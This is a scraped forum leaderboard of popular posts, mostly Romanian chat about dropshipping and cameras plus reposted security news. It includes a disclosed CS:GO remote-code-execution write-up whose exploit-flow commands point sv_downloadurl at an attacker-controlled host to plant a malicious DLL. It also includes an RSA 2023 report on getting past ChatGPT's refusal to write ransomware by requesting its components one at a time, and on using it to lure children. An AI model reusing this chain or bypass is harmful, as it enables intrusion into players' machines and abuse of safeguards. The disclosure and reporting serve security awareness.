Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation since 04/28/23 in all areas

  1. Pe mine ma amuza imaginea reprezentativa. Un oarecare, pe un pc cu windows, editeaza un CSS 🤣
    6 points
  2. Trimit direct la clientul tau. Tu iti faci shop, folosesti un API / webservice pentru sincronizare produse/orders/disponibilitate, iti faci reguli de preturi, adaos, etc. Clientul comanda de la tine, iar platforma ta face cerere catre furnizorul tau la produs(e) si de acolo se trimit direct. In Franta si Germania cred ca 90% din produsele de pe net sunt dropshipping. Totul tine de cat de bine iti faci seo/marketing la platforma si unde/cum alegi sa promovezi cu costuri cat mai mici.
    4 points
  3. Mai bine pui camere fixe. O sa fie nebunie cu PTZ. Eventual poti seta o parte din camere cu public acces, iar o parte cu private acces. (pentru userii inregistrati) Ai vreun plan pus la punct cu ce vrei mai exact pe site? Cum il vad eu, se poate face intr-un weekend la un bidon de cola. Nu-mi trebuie bani
    4 points
  4. A Russian national has been charged and indicted by the U.S. Department of Justice (DoJ) for launching ransomware attacks against "thousands of victims" in the country and across the world. Mikhail Pavlovich Matveev (aka Wazawaka, m1x, Boriselcin, and Uhodiransomwar), the 30-year-old individual in question, is alleged to be a "central figure" in the development and deployment of LockBit, Babuk, and Hive ransomware variants since at least June 2020. "These victims include law enforcement and other government agencies, hospitals, and schools," DoJ said. "Total ransom demands allegedly made by the members of these three global ransomware campaigns to their victims amount to as much as $400 million, while total victim ransom payments amount to as much as $200 million." LockBit, Babuk, and Hive operate alike, leveraging unlawfully obtained access to exfiltrate valuable data and deploy ransomware on compromised networks. The threat actors also threaten to publicize the stolen information on a data leak site in an attempt to negotiate a ransom amount with victims. Matveev has been charged with conspiring to transmit ransom demands, conspiring to damage protected computers, and intentionally damaging protected computers. If convicted, which is unlikely, he faces over 20 years in prison. The U.S. State Department has also announced an award of up to $10 million for information that leads to the arrest and/or conviction of Matveev. Separately, the Treasury Department's Office of Foreign Assets Control (OFAC) announced sanctions against the defendant, stating he claimed "his illicit activities will be tolerated by local authorities provided that he remains loyal to Russia." According to cybersecurity journalist Brian Krebs, one of Matveev's alter egos included Orange, which the defendant used to establish the now-defunct Russian Anonymous Marketplace (aka RAMP) darknet forum. Despite the flurry of law enforcement actions to crack down on the cybercrime ecosystem in recent years, the ransomware-as-a-service (RaaS) model continues to be a lucrative one, offering affiliates high-profit margins without having to develop and maintain the malware themselves. The financial mechanics associated with RaaS has also lowered the barrier to entry for aspiring cybercriminals, who can avail the services offered by the ransomware developers to mount the attacks and pocket the lion's share of the ill-gotten proceeds. Australian and U.S. authorities release BianLian ransomware alert# The development comes as U.S. and Australian cybersecurity agencies released a joint advisory on BianLian ransomware, a double extortion group that has targeted several critical infrastructure, professional services, and property development sectors since June 2022. "The group gains access to victim systems through valid Remote Desktop Protocol (RDP) credentials, uses open-source tools and command-line scripting for discovery and credential harvesting, and exfiltrates victim data via File Transfer Protocol (FTP), Rclone, or Mega," according to the advisory. Czech cybersecurity firm Avast, earlier this year, published a free decryptor for BianLian ransomware to help victims of the malware recover locked files without having to pay the threat actors. The security bulletin also arrives amid the emergence of a new ransomware strain dubbed LokiLocker that shares similarities with another locker called BlackBit and has been observed actively targeting entities in South Korea. Source: https://thehackernews.com/2023/05/us-offers-10-million-bounty-for-capture.html
    3 points
  5. Authored by: Felipe Alain TL;DR We identified three independent remote code execution (RCE) vulnerabilities in the popular Counter-Strike: Global Offensive game. Each vulnerability can be triggered when the game client connects to our malicious python CS:GO server. This post details our journey through the CS:GO binary and conducts a technical deep dive into various identified bugs. We conclude by presenting a proof of concept (POC) exploit that leverages four different logic bugs into remote code execution in the game’s client, triggered when a client connects to the server. Introduction The CS:GO patch dated 04/28/2021 fixed several critical vulnerabilities, including three critical bugs from us. This post describes our approach and how we discovered three critical vulnerabilities. We present a single bug chain, consisting of four logic bugs, and explain how these led to a remote code execution (RCE) on the client by cleverly combining them. Although the post does explain the four logic vulnerabilities, its focus is on the methodology of our research. First we look at existing research for the CS:GO game and give a general introduction to make reverse engineering of the complex client less painful. The post then introduces basic concepts of the CS:GO network protocol like fast_dl and Cvars and detail four different logic bugs. Combining the bugs leads to the proof of concept that exploits a CS:GO client by only connecting to a malicous, attacker controlled server. Table of contents CS:GO Know your target Software Development Kits Public Research Cheating Communities Debug Symbols Fuzzing The discovery of four logic bugs Bug 1: Execution of privileged commands from the server Bug 2: Arbitrary file download due to extension stripping Bug 3: Arbitrary text file write in game directory Bug 4: Fallback to disabled signature checks Full logic bug chain Gameinfo.txt CVars Exploit flow Video Closing Thoughts Timeline CS:GO The free-to-play game Counter Strike: Global Offensive (CS:GO) continues to experience great popularity with 21 million players per month, not least because of the wide variety of game modes offered by the many community-hosted servers. The game from 2012 is based on the even older source engine (2004), known for games such as Portal, Half-Life 2 and Left 4 Dead. The source engine in turn uses components from its predecessors, GoldSrc (1998) and the Quake engine (1996). This history already indicates that the powerful and complex source engine possesses some components, for which security did not yet stand in the foreground while programming. The many game modes, community servers and modding support take a toll: a large attack surface. The many file formats such as textures, 3D models and AI navigation points go through a wide variety of parsers with completely attacker-controlled data as the data is shipped directly from the CS:GO server. In addition, the source engine implements its own TCP-like network stack based on UDP with all the associated problems in such a complex implementation. The network implementation has already been exploited in other attacks. Know your target Security research is not about blindly poking around and looking for security gaps. Because: Only when you have fully understood a target, you are in a position to break through the technical restrictions. The first step should therefore be to obtain as much information about the target as possible. The following sections provide ideas for this “recon” phase: Software Development Kits Games with modding support often provide an official software development kit (SDK). While the SDK does not contain the target’s source code, the structures defined there provide valuable information on network packages and class definitions that help to understand the engine. For Valve games in particular, there have also been several source code leaks of the engine or complete games (2003, 2007, and 2020). Although the source code is often outdated and contains many, now fixed, security holes, these leaks are very helpful. Mostly because source code is simply more pleasant to read than compiler-optimized assembly. Public Research CS:GO is well known, thus we were not the first researchers looking for bugs in this game. Therefore, we searched the Internet for helpful blogposts and presentations at conferences. The information described in this public research is often reduced to the essentials and makes it easier to find one’s way around a new, complex target. Cheating Communities Super annoying in the game, loved by security researchers: Cheater communities like UnknownCheats exist. These forums provide detailed reverse engineering posts and internals to the engine. In this case, Felipe had already written a Network Cheat that contributed a lot to the understanding of the network protocol. Debug Symbols Debug symbols contain the otherwise unrecognizable function names and class structures that make reverse engineering much more convenient. Sometimes versions of the game are also intentionally shipped with debug symbols to generate better error reports. However, sometimes programmers forget to remove the debug symbols from the final binaries of the game. Programmers are humans, and humans make mistakes. CS:GO Binary with Debug Symbols The CS:GO version for macOS from April 2017 (shown below) contained full debug symbols. Game files with symbols are many times larger than without and can therefore be identified automatically using SteamDB and old repositories. 2017-04-26T00:15:42+00:00 [M:8167272392035836136] csgo/bin/osx64/server.dylib (+9.30 MiB) bin/osx64/engine.dylib (+5.17 MiB) bin/osx64/scaleformui.dylib (+3.23 MiB) csgo/bin/osx64/client.dylib (+12.13 MiB) bin/osx64/materialsystem.dylib (+2.18 MiB) While in 2021 it was still possible to specifically download old versions using SteamCMD, the feature seems to have been disabled by Valve in the meantime. Fuzzing Despite all the information, you have to invest many hours in reverse engineering the target. Only once you have fully understood which buffer processes the network data in which virtual function with which arguments you can start doing exciting things. But the effort is worth it: we found instant client crashes using Hongfuzz, the public protobuf network structures, and libprotobuf-mutator. These crashes directly provided instruction pointer control and were thus very likely exploitable! To test the full extent and develop exploit strategies, we decided to implement our own early-stage server in Python. The discovery of four logic bugs For a target like CS:GO, due to years of development and public bug bounty program, simple bugs are most likely fixed by now. If you are only looking for stack overflows in random methods of the huge engine.dll, you will quickly give up in frustration. But it is true: every little anomaly can prove to be valuable in combination with other gaps. During the weeks of staring at the CS:GO disassembly and source-code leaks, we constantly asked ourselves the following questions: What primitives do we already have? What can we do by combining them? What security mechanisms are there? What weird edge cases might a developer not have considered? Memory corruption exploitation is hard. Although two of the three full-chain exploits submitted by us to Valve were memory corruptions, that meant extremely high overhead and always the risk that the client would crash because of an unfavorable memory allocation. Starting CS:GO and connecting to a server loading the map took several minutes each time, which made development very tough. In this post, rather then explaining weird heap feng shui mechanisms, focus on four logic bugs that together led to our goal of remote code execution on the client. The order of discovery was as follows. Bug 1: Execution of privileged commands from the server This bug allows the attacker to execute “privileged” commands on the client that usually only work in the single player mode To verify that our custom python CS:GO server is actually working, we sent the command echo Hello World! to the client via CNETMsg_StringCmd and, as expected, received the output Hello World! on the game console. Randomly, we also tried sending the quit command. And the game closed! We couldn’t believe that a server is allowed to do that. As it turns out, it is usually not allowed to do so: With the help of SourceMod, a source engine modding framework that can also send messages to the client, we recreated the same setup with an official and modded server. The result: FCVAR_SERVER_CAN_EXECUTE prevented server running command: quit. Did we find our entry bug? How exactly does the bug occur? Source engine single-player games internally use a locally hosted source engine server. The single-player client then connects to its own server to join the game. This single-player server should of course have far-reaching rights, e.g., to change the keyboard layout on the client or to take screenshots. A multi-player server is recognized as a local, and thus privileged, single player server if only a maximum of one client can connect to the server. The vulnerability is in the determination of the server type: The maximal number of clients that can connect to the server is controlled by the variable m_nMaxClients and is received by the client when connecting to a server. By chance, our Python server had set the variable m_nMaxClients to 1. And with this we could execute privileged commands on the client! Host_IsSinglePlayerGame Check Bug 2: Arbitrary file download due to extension stripping This bug allows the attacker to download files with arbitrary file extensions, bypassing the extension filter Source engine servers can send additional game files such as maps or player models to the client. The data transfer can be done either via the source network protocol or HTTP fast_dl. To prevent malicious files from being sent to the client, certain file extensions like *.exe, *.dll, *.ini are blocked. If the fast_dl option is set, additional content is loaded from a specified HTTP server rather then from the CS:GO server directly. The URL is dynamically generated from the server name and the full file name by the snprintf(p_cResult, 256, "%s/%s", p_cServerName, p_cFileName) function. The snprintf function limits the length of the resulting string to 256 characters, thus truncating unnecessary characters from the file name. But both p_cServerName and p_cFileName can have a length of 256 characters each! A file name like ././[..]/file.AAA.BBB can be terminated specifically after the .AAA extension, as the .BBB part is truncated by the snprintf function. The filter for potentially dangerous files can thus be bypassed completely! The following source snipped illustrates that the extension is stripped: #include <stdio.h> int main() { unsigned char p_cResult[32]; // String fits into 32 byte and includes the `.bsp` part snprintf(p_cResult, 32, "%s/%s", "AAAAAAAAAAAAAAAA", "evil.dll.bsp"); printf("%s\n", p_cResult); // Output: AAAAAAAAAAAAAAAA/evil.dll.bsp // Long enough string to truncate the `.bsp` part snprintf(p_cResult, 32, "%s/%s", "AAAAAAAAAAAAAAAAAAAAAA", "evil.dll.bsp"); printf("%s\n", p_cResult); // Output: AAAAAAAAAAAAAAAAAAAAAA/evil.dll return 0; } Vulnerable snprintf function cuts remaining data from string This vulnerability was found through code analysis of the fast_dl protocol, which has not changed much in recent years. Bug 3: Arbitrary text file write in game directory This bug allows the attacker to (over)write arbitrary files in the game folder At this point, we were not sure how to combine the two previous bugs. Therefore, we searched the CS:GO binary for helpful privileged commands. With the con_logfile command, we surprisingly discovered that this command could write arbitrary *.log files to arbitrary game folders. Due to a similar extension stripping bug by snprintf it was also possible to specify an arbitrary file extension and thus write text files with arbitrary contents and an arbitrary extension. Specifically, this bug could be used to create a new configuration file cfg/leak.log with arbitrary CS:GO commands. The leak.log “config” file could then the loaded by the exec leak.log command, reading the file from the cfg folder. Bug 4: Fallback to disabled signature checks This bug allows the attacker to launch the CS:GO client in the “insecure” mode, allowing to load non-signed game binaries When starting the CS:GO client, the integrity of the game DLLs is verified via matching hash values. Only after this verification it is possible to play on official servers. If the DLL verification fails, a fallback to the insecure mode occurs. This can also be achieved by the additional command line argument -insecure. Only in this mode, additional DLLs not located in the bin/ game path can be loaded. If the attacker succeeds in making the DLL verification fail, they can create their own DLLs, refer to these DLLs in the configuration and achieve command execution. On Windows, an attacker can specify code that is executed when the DLL is loaded into a process. Thus, the attacker can execute arbitrary code on the client system. Windows prevents the overwriting of DLLs, which are loaded in a running process. Therefore, we had to find a DLL that is verified at game start but is not loaded into the process. Fortunately, we found that the client.dll had been replaced by the client_panorama.dll and is therefore no longer loaded, but is still verified! Overwriting client.dll with arbitrary text (bug 3) thus caused the verification to fail. Full logic bug chain The full bug chain uses all four bugs to: execute privileged commands on the client download a malicious DLL to the game directory replace the gameinfo.txt so that the malicious DLL is loaded on game startup corrupt the client.dll to achieve a fallback to the insecure mode To understand the following steps, we still need to introduce two elements typical for source engines: the gameinfo.txt and CVars: Gameinfo.txt All source engine based games are actually “add-ons” to the basic Half-Life game. Assets and DLLs for the game are loaded from a special path defined in the file gameinfo.txt: "GameInfo" { game "Counter-Strike: Global Offensive" title "COUNTER-STRIKE'" title2 "GO" type multiplayer_only [ ...] FileSystem { SteamAppId 730 // This will mount all the GCFs we need (240=CS:S, 220=HL2). ToolsAppId 211 SearchPaths { Game |gameinfo_path|/exploit // NOTE: Added by our exploit Game |gameinfo_path|. } } } By setting |gameinfo_path|/exploit as first in the FileSystem array, the engine tries to load missing DLLs from this path. Only if the element to be loaded is not found there, the original game path is used. One DLL that is loaded at game start is matchmaking.dll. This means that we can place a new matchmaking.dll and invoke arbitrary code when the CS:GO client loads the DLL. CVars CVars are a fundamental concept in SourceEngine games and appear everywhere. These variables control pretty much everything there is to set up in the game: paths, key-binds, the appearance of crosshairs, the game mode, etc. Also the legendary sv_cheats variable, which many Counter Strike players probably have already heard of, is a CVar. Depending on CVar, the settings can also be set by the server and thus override local options. Upon connecting, the client tells the server which local CVars are set at the client, so that the server can react accordingly. For example, the server can kick the client if sv_cheats is set to 1 at the client. As an attacker, we need to know the installation directory from the CS:GO client so that we can exploit bug 2 and bug 4 by taking a path that is just the right length. Unfortunately, by default, the client does not send along a CVar that contains the current game directory. We therefore use a trick to set the new CVAR GAMEBIN and have it sent back to the attacker-controlled server. The basic idea: Execute a “script” leak.log to set the CVar GAMEBIN Instruct the client to reconnect to the malicious server Upon reconnection, all CVars and set back to the malicious server The details involve invoking the path command from a config file to set the CVAR GAMEBIN to the installation path of the game. We leverage the attacker-written config file leak.log, which includes the path command. The client has to execute the config file, otherwise the CVar is not stored persistently during the next server connect. The leak.log file is executed with the exec command. Afterwards the malicous server instructs the client to reconnect. Upon reconnection, the CVar is leaked back to the server. Exploit flow Component Command Result Bug → connect Client connects to malicious, attacker controlled server → m_nMaxClients = 1 The server can now execute privileged commands on the client Bug 1 → sv_downloadurl = http://<attacker-controlled>/ The client has fast_dl http downloads enabled to download missing assets → con_logfile cfg/leak.log path con_logfile disable exec leak.log The client executes the path command and stores the result in GAMEBIN → reconnect The client reconnects and sends all CVars to the server, leaking the GAMEBIN. The server then creates the downloadtables with a precisely long filename size such that the extension is stripped Bug 2 → <fast_dl download code> The client downloads the malicious exploit/bin/matchmaking.dll and gameinfo.txt from the HTTP server Bug 2 → con_logfile ././././[…]/bin/client.dll.log The bin/client.dll is overwritten with a logfile entry (not a valid DLL anymore) Bug 3 → crash The client crashes. The user restarts the client. <startup> Invalid signature check for overwritten bin/client.dll. Fallback toinsecure and load of overwritten gameinfo.txt Bug 4 <startup> Search in SearchPaths for matchmaking.dll results in DLL found in exploit/bin/matchmaking.dll. LoadLibraryA of malicious, attacker controlled DLL and RCE Video We provide a video of the above outlined chain of the four logic bugs (see below). If you stop the video at 00:29 seconds you can notice interesting output in the CS:GO console and in the exploit server: The leaked GAMEBIN: f:\spiele\steam\steamapps\common\couter-strike global offensive\csgo\bin is retrieved from the exploit server The CS:GO console shows the very long downloaded files, which succeed for the ././[..]/bin/matchmaking.dll.stf ././[..]/gameinfo.txt.stf files. As described above, the .stf extension is stripped during the download, resulting in the download of matchmaking.dll and gameinfo.txt. Link: https://neodyme.io/blog/csgo_from_zero_to_0day/poc_rce.mp4 Closing Thoughts Often people ask us how much time we spent on building this exploit chain. Unfortunately, we can not determine the total time spent. For weeks, we met on Discord in the evening to exchange ideas, programm together and analyze our findings until late in the morning. Alain at that time had roughly 250 hours of gameplay in CS:GO and had not played a single online match. We found the bugs “relatively” quickly, but for their bug bounty program, Valve requires a full-chain exploit demonstrating RCE impact. Without the elaborate demonstration, the research would have been completed after 30% of the time. Hence, we invested quite some time in our RCE demonstration. Speaking of Valve: We became aware of Valve’s high payouts for CS:GO through various and simple looking HackerOne reports. The reports at the time only needed to demonstrate memory corruption to get the full payout. Our initial euphoria quickly sank after our three different reports were quickly declared valid, but still not fixed even after 13 months and multiple requests. After a lot of pressure and the threat of full disclosure, the bugs were finally fixed. The payout was 7.5k per bug, less than we expected. All in all a sobering experience. For us the CS:GO bug bounty journey was the first time we invested weeks of time into a project together. The takeaways for us personally were mainly: Don’t look for cricitial bugs and quick wins only. Chain your bugs to unveal their full potential. Keep your eyes open for edge cases and things devs didn’t think about. Try harder! If run against a wall search for the hole and don’t give up early. Timeline Date Action 01.03.2020 We send the initial Report with PoC video and exploit setup 01.03.2020 H1 has troubles to reproduce the issue 03.03.2020 We provide an exploit Docker setup for easier reproducability 06.03.2020 H1 still has troubles to reproduce the issue 21.03.2020 We provide a full server setup with OpenVPN for even easier reproducability 21.03.2020 H1 successfully reproduces the issue(s) and marks the report as triaged 01.06.2020 We ask for an update 03.06.2020 H1 states they are still looking into the report 18.09.2020 We ask for an update, as a total of half a year has passed by 22.10.2020 We ask again for an update 27.10.2020 H1 states that Valve is still looking into the reports 01.03.2021 We say “Happy Anniversary” and ask for an update March 2021 We contact other researchers who submitted bugs to Valve and think about complaining in our reports as collective 22.04.2021 We write a statement about our dissatisfaction with the process and “reserve the right to disclose the findings in the upcoming weeks” 26.04.2021 H1 states that they flagged the report to “internal managers” and try to speed up the process 30.04.2021 We notice that the issues have been fixed and ask for coordinated disclosure with Valve 01.05.2021 H1 says “Thanks for the report” and we receive our bounty 29.03.2022 We request report disclosure, no response so far Source: https://neodyme.io/blog/csgo_from_zero_to_0day/
    3 points
  6. An advance cross-platform and multi-feature GUI web spider/crawler for cyber security proffesionals. Spider Suite can be used for attack surface mapping and analysis. For more information visit SpiderSuite's website. Installation and Usage Spider Suite is designed for easy installation and usage even for first timers. First, download the package of your choice. Then install the downloaded SpiderSuite package. See First time crawling with SpiderSuite article for tutorial on how to get started. For complete documentation of Spider Suite see wiki. Contributing Can you translate? Visit SpiderSuite's translation project to make translations to your native language. Not a developer? You can help by reporting bugs, requesting new features, improving the documentation, sponsoring the project & writing articles. For More information see contribution guide. Contributers 3nock (main developer) Credits This product includes software developed by the following open source projects: Google's Gumbo HTML Parser Google's Protocal bufffers SQLite database library Graphviz library Download: SpiderSuite-main.zip or git clone https://github.com/3nock/SpiderSuite Source
    3 points
  7. A tinut tot timpul de marketing sau seo (in general, vanzari si imagine). Sunt gramada de oameni care sunt foarte buni in ceea ce fac (programatori, designeri, consultanti). Problema e ca nu toti reusesc sa-si vanda serviciile
    2 points
  8. Ar fi practic ceva la care sa nu dureze 2 luni livrarea. Dar si pretul difera. Deci solutia e pe marketing su SEO.
    2 points
  9. Nu amazon/ebay man. Platforme de prin china, care au si depozite in UE. Aliexpress, joom, gearbest. Cel mai ok ar fi sa studiezi si sa vezi sa te axezi pe o nisa anume, pentru a nu pierde timp inutil sa promovezi zeci/sute de categorii de produse. De exemplu, alegi genti/rucsacuri business (de piele) si promovezi shopul ala. In Germania de exemplu daca vreau o geanta business din piele reala, nu scap sub 300 de euro. Pe joom gasesc mormane si la preturi foarte ok E doar o idee. Ai avantajul ca poti sa te misti mai rapid si sa promovezi o singura categorie de produse. Poti da email-uri la diverse site-uri si spui ca doresti sa revinzi, sa faci dropshipping. Intrebi de la inceput daca ofera webservice / API atat pentru produse cat si pentru orders si apoi iti poti face un plugin pe woocommerce sau iei unul gata facut.
    2 points
  10. cum vrei sa te protejezi cu IP-uri publice? majoritatea utilizate de ciori
    2 points
  11. https://ziarulnapoca.ro/2023/05/19/atac-cibernetic-la-distributie-energie-electrica-romania-zona-transilvania-nord-milioane-de-oameni-in-pericol/
    2 points
  12. "cu privire la un atac cibernetic asupra infrastructurii SCADA" - Daca sunt atat de destepti sa lase SCADA accesibile de pe net isi merita soarta.
    2 points
  13. CTF writeups: https://hiumee.com/posts/RSTCON-3/
    2 points
  14. Nu dețin camerele,nu le-am comandat deoarece așteptăm sa vedem ce spune și cel care poate sa facă aplicația cu ce camere se poate juca…Gigi da acela este proiectul nu am vrut sa îl fac public sa nu încalc ceva de prin regulament
    2 points
  15. Din cate am vazut pe la altii merge chiar foarte bine. As prefera cele 2 ore/zi de bug bounty sa le folosesc pentru droppshipping 😅
    1 point
  16. 1 point
  17. 1 point
  18. Ce inseamna ca l-ai cumparat? Ai user si parola, dar nu poti reseta datele contului (email, telefon)? Vorbeste cu cel de la care ai cumparat. Sa ti le schimbe. E mai usor.
    1 point
  19. 01.03.2021 - We say "Happy anniversary" and ask for an update Nice
    1 point
  20. GTA 6 source code and videos leaked after Rockstar Games hack By Lawrence Abrams September 18, 2022 Grand Theft Auto 6 gameplay videos and source code have been leaked after a hacker allegedly breached Rockstar Game's Slack server and Confluence wiki. The videos and source code were first leaked on GTAForums yesterday, where a threat actor named ‘teapotuberhacker’ shared a link to a RAR archive containing 90 stolen videos. The videos appear to be created by developers debugging various features in the game, such as camera angles, NPC tracking, and locations in Vice City. In addition, some of the videos contain voiced conversations between the protagonist and other NPCs. RAR archive containing the 90 leaked GTA 6 videos The hacker claims to have stolen "GTA 5 and 6 source code and assets, GTA 6 testing build," but is trying to extort Rockstar Games to prevent further data from being released. However, the threat actor says they are accepting offers over $10,000 for the GTA V source code and assets but are not selling the GTA 6 source code at this time. Selling GTA V source code on Telegram Source: BleepingComputer After forum members showed disbelief that the hack was real, the threat actor claimed he was behind the recent cyberattack on Uber and leaked screenshots of source code from both Grand Theft Auto V and Grand Theft Auto 6 as further proof. Rockstar games have not released a statement or responded to our email about the attack at this time. However, Bloomberg's Jason Schreier confirmed the leak was valid after speaking to sources at Rockstar. The leaked videos have since made it onto YouTube and Twitter, with Rockstar Games issuing DMCA infringement notices and takedown requests to get the videos offline. Leaked GTA 6 video taken down on YouTube Source: BleepingComputer "This video is no longer available due to a copyright claim by Take 2 Interactive," reads a copyright claim by Take 2 Interactive, the owner of Rockstar Games. These takedown demands lend further validity to the fact that the leaked GTA 6 videos are real. However, Rockstar Game's efforts come too late, as the threat actor and others had already started leaking the stolen GTA 6 videos and portions of the source code on Telegram. For example, the threat actor leaked a GTA 6 source code file today that is 9,500 lines long and appears to be related to executing scripts for various in-game actions. Claims to be behind Uber attack The hacker hasn’t shared details on how they gained access to the GTA 6 videos and source code other than claiming to have stolen them from Rockstar’s Slack and Confluence servers. The threat actor also claims to be the same hacker, named 'TeaPots,' behind the recent Uber cyberattack, but BleepingComputer could not confirm whether these claims are valid. However, during the cyberattack on Uber, the threat actor also gained access to the company's Slack server and other internal services after performing a social engineering attack on an employee. While there are not enough details about the Rockstar Games hack, the types of servers accessed and the very public announcements are similar to the Uber hacker’s tactics. Sursa: https://www.bleepingcomputer.com/news/security/gta-6-source-code-and-videos-leaked-after-rockstar-games-hack/
    1 point
  21. Salut, da, teoretic prin triangulatie si practic cu pile la STS (doar daca numarul e servit de antenele GSM din RO). Altfel nu prea ai cum.
    1 point
  22. PromptFlow is a tool that allows you to create executable flowcharts that link LLMs (Large Language Models), Prompts, Python functions, and conditional logic together. With PromptFlow, you can create complex workflows in a visual way, without having to write too much code or deal with complicated logic. How it works PromptFlow is based on a visual flowchart editor that allows you to create nodes and connections between them. Each node can be a Prompt, a Python function, or an LLM. Connections between nodes represent conditional logic, and allow you to specify the flow of your program. When you run your flowchart, PromptFlow will execute each node in the order specified by the connections, passing data between nodes as needed. If a node returns a value, that value will be passed to the next node in the flow. Initial Setup Install the required dependencies. Python 3.8+ is required to run PromptFlow. python -m pip install -r requirements.txt Launching Promptflow can be run with Python from the commandline: python run.py If you're having trouble ensure your PYTHONPATH is set correctly: export PYTHONPATH=$PYTHONPATH:. Documentation Official docs website: promptflow.org Building from source To build the sphinx documentation, run: cd docs make html Then open docs/build/html/index.html in your browser. Contributing If you are interested in contributing to PromptFlow, you can do so through building a node. If you find any bugs, do not hesitate to create an issue or open a PR or let us know in Discord. Download: promptflow-main.zip or git clone https://github.com/InsuranceToolkits/promptflow.git
    1 point
  23. Nu cred, dar iti poti face singur unul. Alegi un transformator cu o sectiune bunicica (ex: 8-12 cm2) si folosesti pentru primar cu-em 0.25-0.35 mm, iar pentru secundar poti folosi platbanda de cupru sau teava de cupru pe care o bati pentru a o face plata. Calculul il poti face cam asa: Sectiune: L * l (masori laturile miezului) 50 / sectiune = numarul de spire pe volt infasurare primara: 230 * numarul de spire pe volt * 50 reprezinta frecventa * 230 v reprezinta tensiunea din retea Pentru secundar iti sunt suficiente doua spire iar tolele le pui intretesute (bagi E-urile pe rand, pe o parte si pe alta, apoi I-urile intre ele) * cred ca functioneaza bine si cu o singura spira Recomand totusi o statie de lipit. Pe vremuri se lucra cu pistol de lipit, dar nu existau circuite integrate si mosfeturi sensibile. ** Daca totusi vrei sa cumperi: - Ceva similar cu pistoalele vechi de lipit: https://www.emag.ro/pistol-de-lipit-pentru-electromontaj-polonia-100-w-lampa-iluminare-60105/pd/DD83V5BBM/ - Tot de la polonezi: https://www.zdz-lodz.pl/lutownica-transformatorowa-lt-100-professional-p-5.html
    1 point
  24. Nu ajuta la nimic
    1 point
  25. https://www.raspberrypi.com/products/raspberry-pi-high-quality-camera/
    1 point
  26. dar ce rezolutie au ?
    1 point
  27. Daca vrei sa internautii nostri sa vada in frame-uri prin acea mirifica camera USB. Putem incerca. Exista module care nu sunt pe usb, mai performante pe partea de camere pentru PI, cum ar fi: https://www.robofun.ro/modul-camera-raspberry-pi-high-quality-camera.htm
    1 point
  28. Platforma pentru CTF este disponibilă. Înregistrările sunt deschise: https://ctf.rstcon.com/ Premiile pentru concurs: Locul I 4000 RON Locul II 2000 RON Locul III 1000 RON Cel mai bun write-up 500 RON Premiile sunt oferite din donații de la membrii comunității. Cei care ne pot ajuta cu o donație sunt rugați să ne contacteze la contact@rstcon.com. Astfel există posibilitatea ca valoarea premiilor să fie mai mare. De asemenea, dacă doriți să ne sprijiniți prin crearea unor exerciții CTF, indiferent de gradul de dificultate sau de tematica abordată, așteptăm un email la contact@rstcon.com. Pentru discuții referitoare la CTF vom folosi canalul #ctf de pe Discord. Prezentarea rezultatelor concursului va avea loc la ora 16:00 pe Discord. Informatii complete: https://rstcon.com/ctf/ Revin cu detalii.
    1 point
  29. sau un raspberry pi cu o camera usb, cred ca e cea mai buna optiune , mai ales ca il poti alimenta de pe o baterie si il poti conecta si la internet prin telefon
    1 point
  30. Playlist: https://www.youtube.com/playlist?list=PLTaLvwriPW8xBEH3mFrF7d4EB3IB7M8x1
    1 point
  31. Eu acum l-am descoperit doxbin.com
    1 point
  32. The latest cyber-attack techniques were highlighted by a range of experts during the RSA 2023 Conference. SEO-Based Attacks There has been a significant growth in threat actors leveraging search engine optimization and malvertising to infiltrate users and organizations, according to, Katie Nickels, certified instructor, SANS Institute, and director of intelligence at Red Canary. She said this shift is a sign that “perimeter defenses are improving,” but means that attackers’ utilization of legitimate search engine optimization services is a major new challenge for organizations. Here, threat actors are paying search engine websites to push their malicious sites to the top of search results. Nickels demonstrated that this is proving effective, with the first three results of a particular search she used showing malicious sites. This technique is used for “lots of different intrusions,” including infecting users with infostealer malware, she said. Mitigating these types of attacks is difficult, as the perpetrators are utilizing legitimate and trusted services. Therefore, education is vital – for example, encouraging users to directly enter legitimate websites instead of using a search engines. Nickels added that organizations should utilize tools like ad-blocking software, and most importantly, to report malicious websites being displayed in search engine results on every possible occasion. Targeting of Developers Dr Johannes Ullrich, dean of research, SANS Technology Institute College, highlighted a growing number of attacks “specifically targeting developers.” This is an effective tactic, as developers are typically the first employees in an organization to be exposed to code. There have been numerous cases where threat actors have exploited vulnerabilities in software components to inject malicious software, that are then installed by developers in their business, said Ullrich. This was shown in the LastPass breaches in 2022, in which the attackers targeted a DevOps engineer's home computer by exploiting a vulnerable third-party media software package. Once installed by the developer, the attackers gained the privileges required for remote code execution. Ullrich said increased dialogue with developers from security teams, such as educating them about these types of threats, is crucial to mitigating the risk. Malicious Use of ChatGPT The next attack trend discussed in the session was the nefarious use of ChatGPT – for malware and exploit development. Stephen Sims, offensive operations curriculum lead and fellow, SANS Institute, demonstrated testing he had undertaken on the AI chatbot, to see if he could get it to write ransomware code. Although ChatGPT refused to do so when asked directly, Sims was able to find a way round it by instead asking the tool to write code for the individual components of ransomware, such as code just for encryption. Ultimately, “it wrote the whole thing for us.” Heather Mahalik, DFIR Curriculum Lead, SANS Institute, and senior director of digital intelligence at Cellebrite, also highlighted emerging threats from ChatGPT, focusing on how it can create realistic social engineering campaigns for a range of nefarious purposes. She demonstrated a potentially disturbing use of the tool – to try and sound like a nine-year-old child to entice a child into giving their home address. It proved highly effective in writing a realistic message in this manner. She argued this type of use of ChatGPT is an underappreciated risk, and “one of the biggest threats is definitely ignorance.” New Threat Report Insights During RSA 2023, BlackBerry published its latest Quarterly Global Threat Intelligence Report, covering the period between December 1, 2022 and February 28, 2023. Ismael Valenzuela, Vice President, threat research & intelligence at Blackberry sat down with Infosecurity at the show to discuss some of the main findings. The firm detected a significant increase in cross-platform malware, in which code is created that works across different platforms. “That makes sense as attackers are focused on impact,” Valenzuela stated. Another trend is the rise of infostealers, often used to steal credentials as even relatively minor organizations can provide access to high-value targets, he said. “There’s a lot of people going after credentials, no matter who you are,” added Valenzuela. The report also highlighted regional differences regarding attack techniques being used. Notably, there was a significant uptick in attacks targeting countries in South-East Asia, with Singapore appearing in the top 10 countries that experienced cyber-attacks and Hong Kong in the top 10 countries where unique malware samples were used. It is very important to highlight these variations as “the threats we see there are very unique to that region,” said Valenzuela. He highlighted an attack on a semi-conductor manufacturing company in Taiwan during this period. In this case, a remote access infostealer tool called Warzone was used in a very focused way. “We saw that this malware used geofencing, which means the malware is only going to detonate if it’s executing within a particular region,” explained Valenzuela. This highly targeted incident is very notable, and something to keep an eye on in Taiwan given the geopolitical 